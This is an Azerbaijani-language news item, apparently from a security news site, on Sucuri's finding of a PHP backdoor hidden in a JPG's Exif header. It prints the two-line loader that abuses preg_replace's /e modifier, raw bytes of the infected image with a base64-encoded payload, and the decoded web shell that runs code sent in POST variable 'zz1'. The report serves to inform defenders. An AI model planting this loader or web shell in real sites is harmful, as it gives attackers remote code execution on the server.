Sucuri şirkəti bekdorun veb sayta daxil edilməsinin yeni üsulunu aşkar ediblər : belə ki JPG uzantısının Exif xidməti sətirində gizlədilib. "Sındırılmış" saytda tərkibində PHP funksiyasını birləşdirən normal görünən PHP kod aşkar olunmuşdur. Birinci funksiya JPG faylından Exif verilənlərinin oxunmasına xidmət edir, ikincisi isə proqramı işə salır.
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
Güman etdiyimiz kimi bun.jpg faylında bekdorun ikinci hissəsi aşkar olundu.
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
Make başlığının tərkibində "/.*/e" vardır.
Əgər base 64 ilə şifrələnmiş mətni deşifrə etsək onda aşağıdakını görərik:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
Belə ki, bekdor zz1 dəyişənindən aldığı POST sorğu vasitəsilə istənilən kontenti işə sala bilər. Mütəxəsislərin fikrincə icraedici kodun saytda gizlədilməsinin bu üsulu kifayət qədər qeyri adidir.
12 oktyabr 2024
26 sentyabr 2024
26 iyul 2024
28 iyun 2024
11 iyun 2024
07 iyun 2024
31 may 2024
23 may 2024
© 2011-2024 Bütün Hüquqlar Qorunur
